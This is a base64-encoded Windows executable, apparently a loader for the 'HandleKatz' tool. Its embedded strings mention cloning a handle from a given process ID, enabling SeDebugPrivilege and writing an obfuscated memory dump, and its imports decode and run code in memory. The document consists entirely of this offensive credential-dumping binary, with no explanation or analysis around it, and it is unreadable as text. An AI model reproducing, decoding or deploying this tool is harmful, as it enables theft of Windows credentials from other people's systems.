ERUFFQUFPaXI4Ly8vdXRxY3pidTVNYTBDTVVpSmd4Z0JBQURvbGZQLy83cXZudjJUdVRHdEFqRklpWU1nQVFBQTZIL3ovLys2UlozOWs3a3hyUUl4U0lsRFFPaHM4Ly8vdXNBdDdQcTVEY2xpSmtpSmd5Z0JBQURvVnZQLy8waUR1eEFCQUFBQVNJbURNQUVBQUErRUVRSUFBRWlEdXhnQkFBQUFENFFyQWdBQVNJTzdJQUVBQUFBUGhFVUNBQUJJZzN0Z0FBK0VZZ0lBQUVpRGUyZ0FENFIvQWdBQVNJTzdDQUVBQUFBUGhKa0NBQUJJZzNzSUFBK0V2Z0VBQUVpRGV4QUFENFN6QVFBQVNJTjdHQUFQaEtnQkFBQklnM3NnQUErRW5RRUFBRWlEZXlnQUQ0U1NBUUFBU0lON01BQVBoSWNCQUFCSWczczRBQStFZkFFQUFFaURlMGdBRDRSeEFRQUFTSU43VUFBUGhHWUJBQUJJZzN0WUFBK0VXd0VBQUVpRGUyQUFENFJRQVFBQVNJTjdhQUFQaEVVQkFBQklnM3R3QUErRU9nRUFBRWlEZTNnQUQ0UXZBUUFBU0lPN2dBQUFBQUFQaENFQkFBQklnN3VJQUFBQUFBK0VFd0VBQUVpRHU1QUFBQUFBRDRRRkFRQUFTSU83bUFBQUFBQVBoUGNBQUFCSWc3dWdBQUFBQUErRTZRQUFBRWlEdTZnQUFBQUFENFRiQUFBQVNJTzdzQUFBQUFBUGhNMEFBQUJJZzd1NEFBQUFBQStFdndBQUFFaUR1OEFBQUFBQUQ0U3hBQUFBU0lPN3lBQUFBQUFQaEtNQUFBQklnN3ZRQUFBQUFBK0VsUUFBQUVpRHU5Z0FBQUFBRDRTSEFBQUFTSU83NEFBQUFBQjBmVWlEdStnQUFBQUFkSE5JZzd2d0FBQUFBSFJwU0lPNytBQUFBQUIwWDBpRHV3QUJBQUFBZEZWSWc3c0lBUUFBQUhSTFNJTzdFQUVBQUFCMFFVaUR1eGdCQUFBQWREZElnN3NnQVFBQUFIUXRTSU43UUFCMEpraUR1eWdCQUFBQWRCeElnN3N3QVFBQUFIUVNNY0JJZ3pzQUQ1WEE2d2tQSDRBQUFBQUFNY0JJZzhRZ1c4TzYxdHljNUxtSUp2Z0E2Q0h4Ly85SWc3c1lBUUFBQUVpSmd4QUJBQUFQaGRuOS8vOFBIMEFBdXJWRTliZTVpQ2I0QU9qNThQLy9TSU83SUFFQUFBQklpWU1ZQVFBQUQ0Vy8vZi8vRHg5QUFMcmFuTTI3dVlnbStBRG8wZkQvLzBpRGUyQUFTSW1ESUFFQUFBK0ZwZjMvL3c4ZmdBQUFBQUM2RGdva3BibUlKdmdBNktudy8vOUlnM3RvQUVpSlEyQVBoWXY5Ly85bUxnOGZoQUFBQUFBQXVpM0hFVis1aUNiNEFPaUI4UC8vU0lPN0NBRUFBQUJJaVVOb0Q0VnUvZi8vRHgrQUFBQUFBTG9rQ2lTbHVZZ20rQURvV2ZELy8waUpnd2dCQUFEcFRQMy8vNUNRa0pDUWtKQ1FrSkNRa0pCQlZMb29BQUFBUlRIa1ZsTklpY3RJeDhILy8vLy9TSVBzY0VqSFJDUTRBQUFBQUV5TlJDUTRTTWRFSkVBQUFBQUFTTWRFSkVnQUFBQUE2RW5MLy8rRndIVldNY25IUkNSQUFRQUFBRWk2Y21sMmFXeGxaMlZJdUZObFJHVmlkV2RRU0lsVUpGaElqWFFrUUVpTlZDUlF4MFFrVEFJQUFBQk1qVVFrUkVpSlJDUlF4a1FrWUFEL2t6QUJBQUNGd0hVWFNJdE1KRGovVXloSWc4UndSSW5nVzE1QlhNTVBId0JJaTB3a09FRzVFQUFBQUVtSjhESFNTTWRFSkNnQUFBQUFTTWRFSkNBQUFBQUE2Q0hGLy85SWkwd2tPSVhBZFJqL1V5aEJ2QUVBQUFCSWc4UndSSW5nVzE1QlhNTVBId0QvVXloSWc4UndSSW5nVzE1QlhNT1F1QUVBQUFERGtKQ1FrSkNRa0pDUWtQLy8vLy8vLy8vL0FBQUFBQUFBQUFELy8vLy8vLy8vL3dBQUFBQUFBQUFBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwf0AAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAEAAAADDv///wD8AAAEAAAAAAAAADgAAAAAAAAAAAAAAwBFBAAAAAAAAAAAAAAAAAPB8QAAAAAAAAAAAAAAAAAAQfUAAAAAAACB9QAAAAAAAoH1AAAAAAAAwfUAAAAAAAAB+QAAAAAAAAAAAAAAAAAAQfkAAAAAAAAAAAAAAAAAAIH5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWypdIFJlY29uIG9ubHk6ICVkCgBbKl0gUGF0aCBkbXA6ICVzCgBbKl0gUGlkIHRvIGNsb25lIGZyb206ICVkCgAAAAAAAAAAWypdIEhhbmRsZUthdHogcmV0dXJuIHZhbHVlOiAlZAoAWypdIEhhbmRsZUthdHogb3V0cHV0OgoKACVzCgAtLXJlY29uAC0tcGlkAC0tb3V0ZmlsZQAAACVzIHstLXJlY29ufSB7LS1waWQ6W3BpZCB0byBjbG9uZSBmcm9tXSAtLW91dGZpbGU6W3BhdGggdG8gb2JmdXNjYXRlZCBkbXBdCgAAAAAAAAAAAAAAAAAAAAAAAAAAAOAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBBAAAAAAAIQEEAAAAAAJwQQQAAAAAAQDBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVua25vd24gZXJyb3IAAABBcmd1bWVudCBkb21haW4gZXJyb3IgKERPTUFJTikAAE92ZXJmbG93IHJhbmdlIGVycm9yIChPVkVSRkxPVykAUGFydGlhbCBsb3NzIG9mIHNpZ25pZmljYW5jZSAoUExPU1MpAAAAAFRvdGFsIGxvc3Mgb2Ygc2lnbmlmaWNhbmNlIChUTE9TUykAAAAAAABUaGUgcmVzdWx0IGlzIHRvbyBzbWFsbCB0byBiZSByZXByZXNlbnRlZCAoVU5ERVJGTE9XKQBBcmd1bWVudCBzaW5ndWxhcml0eSAoU0lHTikAAAAAAAAAX21hdGhlcnIoKTogJXMgaW4gJXMoJWcsICVnKSAgKHJldHZhbD0lZykKAADoOP//nDj//zQ4//+8OP//zDj//9w4//+sOP//TWluZ3ctdzY0IHJ1bnRpbWUgZmFpbHVyZToKAAAAAABBZGRyZXNzICVwIGhhcyBubyBpbWFnZS1zZWN0aW9uACAgVmlydHVhbFF1ZXJ5IGZhaWxlZCBmb3IgJWQgYnl0ZXMgYXQgYWRkcmVzcyAlcAAAAAAAAAAAICBWaXJ0dWFsUHJvdGVjdCBmYWlsZWQgd2l0aCBjb2RlIDB4JXgAACAgVW5rbm93biBwc2V1ZG8gcmVsb2NhdGlvbiBwcm90b2NvbCB2ZXJzaW9uICVkLgoAAAAAAAAAICBVbmtub3duIHBzZXVkbyByZWxvY2F0aW9uIGJpdCBzaXplICVkLgoAAAAAAAAAAAAAAAAAAACwPf//sD3//7A9//+wPf//sD3//xg9//+wPf//4D3//xg9//9DPf//AAAAAAAAAAAobnVsbCkATmFOAEluZgAAKABuAHUAbABsACkAAAAAALJo//+4Yv//uGL//8xo//+4Yv//1Gf//7hi///rZ///uGL//7hi//9gaP//nGj//7hi//9nZv//gGb//7hi//+cZv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7xm//+4Yv//9Gb//7hi//8sZ///ZGf//5xn//+4Yv//ImX//7hi//+4Yv//UGb//7hi//+4Yv//uGL//7hi//+4Yv//uGL//+lo//+4Yv//uGL//7hi//+4Yv//MGP//7hi//+4Yv//uGL//7hi//+4Yv//uGL//7hi//+4Yv//qmT//7hi//8nZP//oGP//0pl///gZf//GGb//4Jl//+gY///iGP//7hi//+iZf//wmX//2xk//8wY//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